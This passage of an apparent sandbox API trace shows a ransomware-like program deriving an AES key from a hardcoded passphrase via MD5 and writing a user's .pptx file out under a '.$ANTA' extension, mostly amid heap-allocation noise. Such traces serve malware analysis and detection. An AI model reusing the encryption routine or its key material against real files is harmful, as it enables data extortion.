dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0079.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0079.169] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca6e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0079.169] CloseHandle (hObject=0x258) returned 1 [0079.169] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.169] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0079.169] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe20f20, ftCreationTime.dwHighDateTime=0x1d5e0ea, ftLastAccessTime.dwLowDateTime=0x240c9dd0, ftLastAccessTime.dwHighDateTime=0x1d5e626, ftLastWriteTime.dwLowDateTime=0x240c9dd0, ftLastWriteTime.dwHighDateTime=0x1d5e626, nFileSizeHigh=0x0, nFileSizeLow=0xb11b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="g_XT5mjGuHk8Nmh4F.pptx", cAlternateFileName="G_XT5M~1.PPT")) returned 0x41ac280 [0079.170] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0079.170] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.170] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.170] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.170] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.170] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a49d0) returned 1 [0079.174] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.174] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.174] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cace8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.179] CryptCreateHash (in: hProv=0x41a49d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.179] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb048, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.179] CryptHashData (hHash=0x41ac780, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cadd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.179] CryptDeriveKey (in: hProv=0x41a49d0, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41abfc0) returned 1 [0079.180] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0079.180] CryptDestroyHash (hHash=0x41ac780) returned 1 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.180] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0079.181] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0079.181] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0079.181] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.181] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\g_xt5mjguhk8nmh4f.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.181] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.181] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.182] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.182] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.182] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.182] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0079.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0079.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.183] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0079.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0079.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a47b0 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a47b0 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.184] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0079.184] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0079.184] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: hHeap=0x1780000) returned 1 [0079.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0079.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0079.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0079.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\g_xt5mjguhk8nmh4f.pptx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0079.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.185] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.186] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.186] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.186] RtlAllocateHeap 